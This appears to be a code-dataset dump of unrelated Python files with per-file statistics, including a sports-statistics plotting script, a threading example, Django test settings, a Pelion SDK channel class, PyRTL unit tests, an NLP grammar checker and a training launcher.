team1 = "Western Bulldogs"
elif team1 == "South Melbourne":
team1 = "Sydney"
if team2 == "Kangaroos":
team2 = "North Melbourne"
elif team2 == "Brisbane Bears":
team2 = "Brisbane Lions"
elif team2 == "Footscray":
team2 = "Western Bulldogs"
elif team2 == "South Melbourne":
team2 = "Sydney"
if team1 in clubs:
clubs[team1][1].append(k)
if k not in clubs[team1][0]:
clubs[team1][0].append(k)
else:
clubs[team1] = [[k], [k]]
if team2 in clubs:
clubs[team2][1].append(k)
if k not in clubs[team2][0]:
clubs[team2][0].append(k)
else:
clubs[team2] = [[k], [k]]
with open(path_to_file, "w") as f:
f.write(str(clubs))
#"""
all_clubs_windows = 0
all_club_window_lengths = []
all_clubs_prelim_distances = []
all_clubs_years_twixt_clusters = []
all_clubs_years_twixt_clusters_1990 = []
prelims_1990 = 0
club_windows_1990 = 0
club_window_lengths_1990 = []
club_prelim_distances_1990 = []
fig = plt.figure()
ax = fig.add_subplot(111, alpha=0.7)
for i in clubs:
ax.set_prop_cycle(color=colours[i])
year_finished = clubs[i][0][-1]
years_b4_pre = (clubs[i][0][0] - year_started) * [0]
years_since_pre = (last_season + 1 - year_finished) * [len(clubs[i][0])]
seasons = list(range(1, len(clubs[i][0]) + 1))
x = (len(years_b4_pre) * [clubs[i][0][0]]) + clubs[i][0] + [last_season + 1]
y = years_b4_pre + seasons + [len(clubs[i][0])]
wins_y = [seasons[clubs[i][0].index(k)] for k in clubs[i][1]]
ax.scatter(clubs[i][1], wins_y)
last = clubs[i][0][0]
record = [last]
total_windows = 0
window_lengths = []
years_between_prelims = np.diff(np.array(clubs[i][0])).tolist()
years_between_prelims.append(last_season + 1 - clubs[i][0][-1])
all_clubs_prelim_distances += years_between_prelims
years_between_clusters = []
years_between_clusters_1990 = []
flag = True
for k in clubs[i][0][1:]:
if k > 1990 and flag and clubs[i][0][0] < 1990:
years_between_clusters_1990.append(k - 1990)
flag = False
if k >= 1990:
prelims_1990 += 1
if last >= 1990:
club_prelim_distances_1990.append(k - last)
if k - last < 3:
record.append(k)
last = k
if k != clubs[i][0][-1]:
continue
if k != record[-1]:
years_between_clusters.append(k - record[-1])
if record[-1] >= 1990:
years_between_clusters_1990.append(k - record[-1])
if len(record) > 1:
total_windows += 1
all_clubs_windows += len(record)
if (record[0] >= 1990):
club_windows_1990 += len(record)
club_window_lengths_1990.append(record[-1] + 1 - record[0])
window_lengths.append(record[-1] + 1 - record[0])
x2 = [record[0], record[-1]]
y2 = [y[x.index(record[0])], y[x.index(record[-1])]]
ax.set_prop_cycle(color=colours[i])
ax.plot(x2, y2, ':')
record = [k]
last = k
all_club_window_lengths += window_lengths
diff_last_Season_and_last_prelim = last_season + 1 - clubs[i][0][-1]
years_between_clusters.append(diff_last_Season_and_last_prelim)
years_between_clusters_1990.append(diff_last_Season_and_last_prelim)
club_prelim_distances_1990.append(diff_last_Season_and_last_prelim)
all_clubs_years_twixt_clusters += years_between_clusters
all_clubs_years_twixt_clusters_1990 += years_between_clusters_1990
ax.step(x, y, alpha=0.7, where='post', label=("{} {} {} {} {} {} {} {}".format(
i,
len(clubs[i][0]),
p(len(clubs[i][1])/len(clubs[i][0])),
total_windows,
round(statistics.mean(window_lengths), 2),
round(statistics.mean(years_between_prelims), 2),
round(statistics.mean(years_between_clusters), 2),
' ' #round(statistics.mean(years_between_clusters_1990), 2)
)))
ax.set_xticks([i for i in range(year_started - int(str(year_started)[-1]), (last_season + (last_season % 10) + 10), 10)])
plt.ylabel('Prelim Finals w/ wins as dots ')
'''+
p(club_windows_1990/prelims_1990) +
" " +
str(round(statistics.mean(club_window_lengths_1990), 2)) +
" " +
str(round(statistics.mean(club_prelim_distances_1990), 2)) +
" " +
str(round(statistics.mean(all_clubs_years_twixt_clusters_1990), 2))
)'''
plt.xlabel('Years')
plt.title("Prelim finals by club " +
p(all_clubs_windows/sum(len(clubs[i][0]) for i in clubs)) +
" " +
str(round(statistics.mean(all_club_window_lengths), 2)) +
" " +
str(round(statistics.mean(all_clubs_prelim_distances), 2)) +
" " +
str(round(statistics.mean(all_clubs_years_twixt_clusters), 2))
)
plt.legend()
plt.minorticks_on()
plt.grid(which='minor')
plt.grid(which='major', color="black")
plt.show() | 37.25 | 487 | 0.611409 | 1,219 | 8,940 | 4.326497 | 0.249385 | 0.023891 | 0.023891 | 0.020478 | 0.377892 | 0.300531 | 0.274744 | 0.188093 | 0.166098 | 0.142965 | 0 | 0.047321 | 0.248322 | 8,940 | 240 | 488 | 37.25 | 0.7375 | 0.013311 | 0 | 0.059322 | 0 | 0 | 0.096548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.059322 | 0.008475 | 0.09322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84c6f19fcf928a5eaad205c482d3ee5050bf93d | 1,377 | py | Python | com/shbak/effective_python/_01_example/_57_do_not_create_thread_when_fan_out/main.py | sanghyunbak/effective_python | e35d880c47e988607e4a11aa6eb6b62ae887688a | [
"Apache-2.0"
] | null | null | null | com/shbak/effective_python/_01_example/_57_do_not_create_thread_when_fan_out/main.py | sanghyunbak/effective_python | e35d880c47e988607e4a11aa6eb6b62ae887688a | [
"Apache-2.0"
] | null | null | null | com/shbak/effective_python/_01_example/_57_do_not_create_thread_when_fan_out/main.py | sanghyunbak/effective_python | e35d880c47e988607e4a11aa6eb6b62ae887688a | [
"Apache-2.0"
] | null | null | null | import contextlib
import io
from threading import Lock, Thread
from com.shbak.effective_python._01_example._56_when_need_concurrent.main import Grid, step_cell
ALIVE = '*'
EMPTY = '-'
class LockingGrid(Grid):
def __init__(self, height, width):
super().__init__(height, width)
self.lock = Lock()
def __str__(self):
with self.lock:
return super().__str__()
def get(self, y, x):
with self.lock:
return super().get(y, x)
def set(self, y, x, state):
with self.lock:
return super().set(y, x, state)
def simulated_threaded(grid):
next_grid = LockingGrid(grid.height, grid.width)
threads = []
for y in range(grid.height):
for x in range(grid.width):
args = (y, x, grid.get, next_grid.set)
thread = Thread(target=step_cell, args=args)
thread.start() # fan out
threads.append(thread)
for thread in threads:
thread.join() # fan in
return next_grid
def error_raise():
raise OSError('I/O problam occur!')
def thread_redirect_stderr_to_string_io():
fake_stderr = io.StringIO()
with contextlib.redirect_stderr(fake_stderr):
thread = Thread(target=error_raise())
thread.start()
thread.join()
if __name__ == '__main__':
thread_redirect_stderr_to_string_io()
| 22.95 | 96 | 0.626725 | 180 | 1,377 | 4.505556 | 0.377778 | 0.01233 | 0.04439 | 0.066584 | 0.159063 | 0.073983 | 0 | 0 | 0 | 0 | 0 | 0.003925 | 0.259985 | 1,377 | 59 | 97 | 23.338983 | 0.791953 | 0.010167 | 0 | 0.170732 | 0 | 0 | 0.020588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.097561 | 0 | 0.390244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84dfd15f39f42c196fa2a0525db207d2d2d2d42 | 612 | py | Python | util/csv_format.py | lightfar125/lotto-predict | f8b5348dd8336609d24cefc57f237976a6a3f3da | [
"Unlicense"
] | 6 | 2020-04-01T03:09:19.000Z | 2022-01-18T14:43:58.000Z | util/csv_format.py | lightfar125/lotto-predict | f8b5348dd8336609d24cefc57f237976a6a3f3da | [
"Unlicense"
] | null | null | null | util/csv_format.py | lightfar125/lotto-predict | f8b5348dd8336609d24cefc57f237976a6a3f3da | [
"Unlicense"
] | 4 | 2020-01-29T06:26:24.000Z | 2022-01-14T12:12:57.000Z | # Process scraped csv into correct format
import csv
from pathlib import Path
from dateutil import parser
path = Path()
data_folder = 'data'
infile = path / data_folder / '2019.csv'
outfile = path / data_folder / '2019_formatted.csv'
with open(infile, 'r') as in_csv:
reader = csv.reader(in_csv, delimiter=',')
with open(outfile, 'w', newline='') as out_csv:
writer = csv.writer(out_csv, delimiter=',')
for r in reversed(list(reader)):
dt = parser.parse(r[0])
newrow = [dt.date(), r[1], r[2], r[3], r[4], r[5], r[6], r[7]]
writer.writerow(newrow)
| 27.818182 | 74 | 0.619281 | 92 | 612 | 4.032609 | 0.48913 | 0.06469 | 0.113208 | 0.097035 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033827 | 0.227124 | 612 | 21 | 75 | 29.142857 | 0.750529 | 0.063725 | 0 | 0 | 0 | 0 | 0.059545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84e19a2090b65754703d534e8ab228e0ef2d3d1 | 6,060 | py | Python | testsite/settings.py | djaodjin/djaodjin-multitier | 0d683cbdeca74dfe3bd3f2c5792dbdd2de52d639 | [
"BSD-2-Clause"
] | 8 | 2015-07-26T18:33:21.000Z | 2021-06-25T09:40:11.000Z | testsite/settings.py | djaodjin/djaodjin-multitier | 0d683cbdeca74dfe3bd3f2c5792dbdd2de52d639 | [
"BSD-2-Clause"
] | 8 | 2019-01-30T10:02:25.000Z | 2021-07-30T23:22:45.000Z | testsite/settings.py | djaodjin/djaodjin-multitier | 0d683cbdeca74dfe3bd3f2c5792dbdd2de52d639 | [
"BSD-2-Clause"
] | 5 | 2015-09-05T20:24:45.000Z | 2020-08-24T18:09:17.000Z | """
Django settings for testsite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_NAME = os.path.basename(BASE_DIR)
def load_config(confpath):
'''
Given a path to a file, parse its lines in ini-like format, and then
set them in the current namespace.
'''
# todo: consider using something like ConfigObj for this:
# http://www.voidspace.org.uk/python/configobj.html
import re, sys
if os.path.isfile(confpath):
sys.stderr.write('config loaded from %s\n' % confpath)
with open(confpath) as conffile:
line = conffile.readline()
while line != '':
if not line.startswith('#'):
look = re.match(r'(\w+)\s*=\s*(.*)', line)
if look:
value = look.group(2) \
% {'LOCALSTATEDIR': BASE_DIR + '/var'}
try:
# Once Django 1.5 introduced ALLOWED_HOSTS (a tuple
# definitely in the site.conf set), we had no choice
# other than using eval. The {} are here to restrict
# the globals and locals context eval has access to.
# pylint: disable=eval-used
setattr(sys.modules[__name__],
look.group(1).upper(), eval(value, {}, {}))
except Exception:
raise
line = conffile.readline()
else:
sys.stderr.write('warning: config file %s does not exist.\n' % confpath)
load_config(os.path.join(BASE_DIR, 'credentials'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# Application definition
INSTALLED_APPS = (
'django_extensions',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'multitier',
'testsite',
)
MIDDLEWARE = (
'multitier.middleware.SiteMiddleware',
'multitier.middleware.SetRemoteAddrFromForwardedFor',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
MIDDLEWARE_CLASSES = MIDDLEWARE
ROOT_URLCONF = 'testsite.urls'
WSGI_APPLICATION = 'testsite.wsgi.application'
# Templates
# ---------
TEMPLATE_DEBUG = True
# Django 1.7 and below
TEMPLATE_LOADERS = (
'multitier.loaders.django.Loader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.media',
'django.core.context_processors.static',
'multitier.context_processors.site',
'multitier.context_processors.features_debug'
)
TEMPLATE_DIRS = (
BASE_DIR + '/testsite/templates',
)
# Django 1.8+
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': TEMPLATE_DIRS,
'OPTIONS': {
'context_processors': [proc.replace(
'django.core.context_processors',
'django.template.context_processors')
for proc in TEMPLATE_CONTEXT_PROCESSORS],
'loaders': TEMPLATE_LOADERS},
},
]
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASE_ROUTERS = ('multitier.routers.SiteRouter',)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite')
}
}
if os.getenv('MULTITIER_DB_FILE'):
MULTITIER_DB_FILE = os.getenv('MULTITIER_DB_FILE')
MULTITIER_DB_NAME = os.path.splitext(
os.path.basename(MULTITIER_DB_FILE))[0]
DATABASES.update({MULTITIER_DB_NAME: {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': MULTITIER_DB_FILE,
}})
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR + '/testsite/media'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_ROOT = BASE_DIR + '/testsite/static'
STATIC_URL = '/static/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'logfile':{
'level':'DEBUG',
'class':'logging.StreamHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'multitier': {
'handlers': ['logfile'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
# 'django.db.backends': {
# 'handlers': ['logfile'],
# 'level': 'DEBUG',
# 'propagate': True,
# },
}
}
LOGIN_REDIRECT_URL = 'accounts_profile'
| 29.275362 | 80 | 0.607756 | 639 | 6,060 | 5.635368 | 0.400626 | 0.039711 | 0.036656 | 0.041655 | 0.133296 | 0.10025 | 0.081922 | 0.063038 | 0.022216 | 0 | 0 | 0.006686 | 0.259571 | 6,060 | 206 | 81 | 29.417476 | 0.795855 | 0.230363 | 0 | 0.059259 | 0 | 0 | 0.37744 | 0.241866 | 0 | 0 | 0 | 0.004854 | 0 | 1 | 0.007407 | false | 0 | 0.014815 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84e8a6736cf9d27a7da833746cbb7a06fdccfc8 | 3,774 | py | Python | src/mbed_cloud/subscribe/channels/device_state_changes.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 12 | 2017-12-28T11:18:43.000Z | 2020-10-04T12:11:15.000Z | src/mbed_cloud/subscribe/channels/device_state_changes.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 50 | 2017-12-21T12:50:41.000Z | 2020-01-13T16:07:08.000Z | src/mbed_cloud/subscribe/channels/device_state_changes.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 8 | 2018-04-25T17:47:29.000Z | 2019-08-29T06:38:27.000Z | # --------------------------------------------------------------------------
# Pelion Device Management SDK
# (C) COPYRIGHT 2017 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""A Channels API module"""
from __future__ import absolute_import
from mbed_cloud.subscribe.channels.channel import ChannelIdentifiers
from mbed_cloud.subscribe.channels.channel import ChannelSubscription
from mbed_cloud.subscribe.subscribe import expand_dict_as_keys
class DeviceStateChanges(ChannelSubscription):
"""Triggers on changes to registration state of devices"""
def __init__(self, device_id=None, **extra_filters):
"""Triggers on changes to registration state of devices
.. warning:: This functionality is considered experimental;
the interface may change in future releases
:param device_id: a device identifier
:param extra_filters: additional filters e.g. dict(channel=API_CHANNELS.registrations)
"""
super(DeviceStateChanges, self).__init__()
self._route_keys = expand_dict_as_keys(dict(
channel=[
ChannelIdentifiers.de_registrations,
ChannelIdentifiers.reg_updates,
ChannelIdentifiers.registrations_expired,
ChannelIdentifiers.registrations,
],
))
self._optional_filters = {}
if device_id is not None:
self._optional_filters['device_id'] = device_id
self._optional_filters.update(extra_filters)
@staticmethod
def _map_resource_data(resource_data):
attribute_map = {
"path": "path",
"rt": "type",
"ct": "content_type",
"obs": "observable"
}
new_items = map(
lambda item: (item[1], resource_data.get(item[0], None)),
attribute_map.items()
)
return dict(new_items)
@staticmethod
def _map_endpoint_data(endpoint_data):
attribute_map = {
"ep": "device_id",
"original_ep": "alias",
"ept": "device_type",
"q": "queue_mode",
"channel": "channel"
}
output = dict(map(
lambda item: (item[1], endpoint_data.get(item[0], None)),
attribute_map.items()
))
output["resources"] = list(map(
DeviceStateChanges._map_resource_data, endpoint_data.get("resources", [])
))
return output
def start(self):
"""Start the channel"""
super(DeviceStateChanges, self).start()
# n.b. No true start/stop implementation as DeviceState is permanently subscribed
self._api.ensure_notifications_thread()
def notify(self, data):
"""Notify this channel of inbound data"""
string_channels = {
ChannelIdentifiers.de_registrations,
ChannelIdentifiers.registrations_expired
}
if data['channel'] in string_channels:
message = {'device_id': data["value"], 'channel': data["channel"]}
else:
message = DeviceStateChanges._map_endpoint_data(data)
return super(DeviceStateChanges, self).notify(message)
| 34.944444 | 94 | 0.620297 | 397 | 3,774 | 5.700252 | 0.425693 | 0.024746 | 0.017234 | 0.029165 | 0.122846 | 0.106938 | 0.106938 | 0.068935 | 0 | 0 | 0 | 0.004252 | 0.252252 | 3,774 | 107 | 95 | 35.271028 | 0.797661 | 0.324324 | 0 | 0.177419 | 0 | 0 | 0.068504 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080645 | false | 0 | 0.064516 | 0 | 0.209677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84f9de68045c4d14dd04bfc02dff0e790085a22 | 2,452 | py | Python | tests/rtllib/test_barrel.py | ryoon/PyRTL | 71a927afa6e8a1a00204cf42abde2514867c921e | [
"BSD-3-Clause"
] | null | null | null | tests/rtllib/test_barrel.py | ryoon/PyRTL | 71a927afa6e8a1a00204cf42abde2514867c921e | [
"BSD-3-Clause"
] | null | null | null | tests/rtllib/test_barrel.py | ryoon/PyRTL | 71a927afa6e8a1a00204cf42abde2514867c921e | [
"BSD-3-Clause"
] | null | null | null | import unittest
import random
import pyrtl
from pyrtl.rtllib import barrel
class TestBarrel(unittest.TestCase):
# @classmethod
# def setUpClass(cls):
# # this is to ensure reproducibility
# random.seed(777906374)
def setUp(self):
pyrtl.reset_working_block()
self.inp_val = pyrtl.Input(8, 'inp_val')
self.inp_shift = pyrtl.Input(2, 'inp_shift')
self.out_zeros = pyrtl.Output(18, 'out_zeros')
self.out_ones = pyrtl.Output(18, 'out_ones')
def test_shift_left(self):
random.seed(777906373)
zero = pyrtl.Const(0, 1)
one = pyrtl.Const(1, 1)
self.out_zeros <<= barrel.barrel_shifter(self.inp_val, zero, one, self.inp_shift)
self.out_ones <<= barrel.barrel_shifter(self.inp_val, one, one, self.inp_shift)
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
vals = [random.randint(0, 20) for v in range(20)]
shifts = [random.randint(0, 3) for s in range(20)]
for i in range(len(vals)):
sim.step({
self.inp_val: vals[i],
self.inp_shift: shifts[i]
})
base_sum = vals[i] * pow(2, shifts[i])
self.assertEquals(sim.inspect(self.out_zeros), base_sum)
self.assertEquals(sim.inspect(self.out_ones), base_sum + pow(2, shifts[i]) - 1)
def test_shift_right(self):
random.seed(777906374)
zero = pyrtl.Const(0, 1)
one = pyrtl.Const(1, 1)
self.out_zeros <<= barrel.barrel_shifter(self.inp_val, zero, zero, self.inp_shift)
self.out_ones <<= barrel.barrel_shifter(self.inp_val, one, zero, self.inp_shift)
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
vals = [random.randint(0, 20) for v in range(20)]
shifts = [random.randint(0, 3) for s in range(20)]
for i in range(len(vals)):
sim.step({
self.inp_val: vals[i],
self.inp_shift: shifts[i]
})
base_sum = int(vals[i] / pow(2, shifts[i]))
self.assertEqual(sim.inspect(self.out_zeros), base_sum, "failed on value %d" % vals[i])
extra_sum = sum([pow(2, len(self.inp_val) - b - 1) for b in range(shifts[i])])
self.assertEquals(sim.inspect(self.out_ones), base_sum + extra_sum,
"failed on value %d" % vals[i])
| 40.866667 | 99 | 0.595432 | 343 | 2,452 | 4.107872 | 0.227405 | 0.074521 | 0.056778 | 0.065295 | 0.651526 | 0.651526 | 0.651526 | 0.572747 | 0.53939 | 0.476934 | 0 | 0.036558 | 0.274878 | 2,452 | 59 | 100 | 41.559322 | 0.755906 | 0.040375 | 0 | 0.44898 | 0 | 0 | 0.029399 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 1 | 0.061224 | false | 0 | 0.081633 | 0 | 0.163265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8514bbfb63dbbb2d0407c295ba64862f4ef0007 | 918 | py | Python | train_from_checkpoint.py | harry-uglow/Curriculum-Reinforcement-Learning | cb050556e1fdc7b7de8d63ad932fc712a35ac144 | [
"MIT"
] | 15 | 2020-02-02T22:22:41.000Z | 2022-03-03T07:50:45.000Z | train_from_checkpoint.py | harry-uglow/Deep-RL-Sim2Real | cb050556e1fdc7b7de8d63ad932fc712a35ac144 | [
"MIT"
] | 8 | 2020-01-28T20:45:54.000Z | 2022-03-14T07:58:27.000Z | train_from_checkpoint.py | harry-uglow/Curriculum-Reinforcement-Learning | cb050556e1fdc7b7de8d63ad932fc712a35ac144 | [
"MIT"
] | 5 | 2020-03-26T15:46:51.000Z | 2022-01-17T09:48:02.000Z | import os
from main import args
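# Note: `args` is assumed to come from main.py's argparse setup and to expose
# .pipeline, .save_as and .trg_succ_rate; this script then shells out to
# main.py once per (curriculum length, seed) pair.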
if __name__ == "__main__":
pipeline_base = args.pipeline
results = []
tags = []
save_base = args.save_as
target = args.trg_succ_rate
for i in range(5):
length = f"{2**i}cm"
curr_pipeline = f"{args.pipeline}_{2**i}"
args.trg_succ_rate = target
for seed in [0, 16, 32]:
print(f"Training with {length} curriculum (if available)...")
try:
os.system(f"python main.py --save-as {save_base}_{length} --scene-name dish_rack "
f"--num-steps 256 --num-processes 16 --no-cuda --eval-interval 4 "
f"--initial-policy {save_base}_{length}_{seed}_dish_rack_11 "
f"--reuse-residual --trg-succ-rate {args.trg_succ_rate} "
f"--pipeline rack_res")
except KeyError:
continue
| 35.307692 | 98 | 0.539216 | 116 | 918 | 4.017241 | 0.525862 | 0.060086 | 0.094421 | 0.096567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026273 | 0.336601 | 918 | 25 | 99 | 36.72 | 0.738916 | 0 | 0 | 0 | 0 | 0 | 0.38386 | 0.067612 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8542643da025c6082b1912116a149f8d9ed2712 | 1,613 | py | Python | ch7/7_3_SVArule.py | bronevet-abc/NLPython | edb2f2c558215df556449c0fafb717d3442cfd9b | [
"MIT"
] | null | null | null | ch7/7_3_SVArule.py | bronevet-abc/NLPython | edb2f2c558215df556449c0fafb717d3442cfd9b | [
"MIT"
] | null | null | null | ch7/7_3_SVArule.py | bronevet-abc/NLPython | edb2f2c558215df556449c0fafb717d3442cfd9b | [
"MIT"
] | null | null | null | from pycorenlp import StanfordCoreNLP
from nltk.tree import Tree
nlp = StanfordCoreNLP('http://localhost:9000')
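# Assumes a CoreNLP server is already listening on localhost:9000, e.g. started
# from the CoreNLP distribution directory with:
#   java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000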
def rulelogic(sentence):
leaves_list = []
text = sentence
output = nlp.annotate(text, properties={
'annotators': 'tokenize,ssplit,pos,depparse,parse',
'outputFormat': 'json'
})
parsetree = output['sentences'][0]['parse']
#print parsetree
for i in Tree.fromstring(parsetree).subtrees():
if i.label() == 'PRP':
#print i.leaves(), i.label()
leaves_list.append(i.leaves())
if i.label() == 'VBP' or i.label() == 'VBZ':
#print i.leaves(), i.label()
leaves_list.append(i.label())
#print leaves_list
if (any("We" in x for x in leaves_list) or any("I" in x for x in leaves_list) or any(
"You" in x for x in leaves_list) or any("They" in x for x in leaves_list)) and any("VBZ" in x for x in leaves_list):
print("Alert: \nPlease check Subject and verb in the sentence.\nYou may have plural subject and singular verb. ")
elif(any("He" in x for x in leaves_list) or any("She" in x for x in leaves_list) or any(
"It" in x for x in leaves_list)) and any("VBP" in x for x in leaves_list):
print("Alert: \nPlease check subject and verb in the sentence.\n" \
"You may have singular subject and plural verb.")
else:
print("You have correct sentence.")
if __name__ == "__main__":
rulelogic('We know cooking.')
# 'He drink tomato soup in the morning.'
# 'We plays game online.
# She know cooking.
| 40.325 | 136 | 0.615623 | 237 | 1,613 | 4.101266 | 0.333333 | 0.133745 | 0.055556 | 0.064815 | 0.386831 | 0.386831 | 0.386831 | 0.386831 | 0.386831 | 0.139918 | 0 | 0.004188 | 0.259764 | 1,613 | 39 | 137 | 41.358974 | 0.809883 | 0.102914 | 0 | 0 | 0 | 0.037037 | 0.266667 | 0.023611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a854da79478676b3e52986d8ebfc520db2a322db | 17,336 | py | Python | litho/gdsii/record.py | xj361685640/DimmiLitho | 2d3d335bdab8ae628f328c264b655b180881e3a1 | [
"MIT"
] | 32 | 2016-05-27T07:35:44.000Z | 2022-03-24T07:53:03.000Z | litho/gdsii/record.py | xj361685640/DimmiLitho | 2d3d335bdab8ae628f328c264b655b180881e3a1 | [
"MIT"
] | 2 | 2021-05-04T03:09:48.000Z | 2021-12-04T17:24:55.000Z | litho/gdsii/record.py | xj361685640/DimmiLitho | 2d3d335bdab8ae628f328c264b655b180881e3a1 | [
"MIT"
] | 18 | 2017-06-27T06:16:34.000Z | 2022-03-21T06:52:35.000Z | # -*- coding: utf-8 -*-
#
# Copyright © 2010 Eugeniy Meshcheryakov <eugen@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
:mod:`gdsii.record` --- GDSII record I/O
========================================
This module contains classes for low-level GDSII I/O.
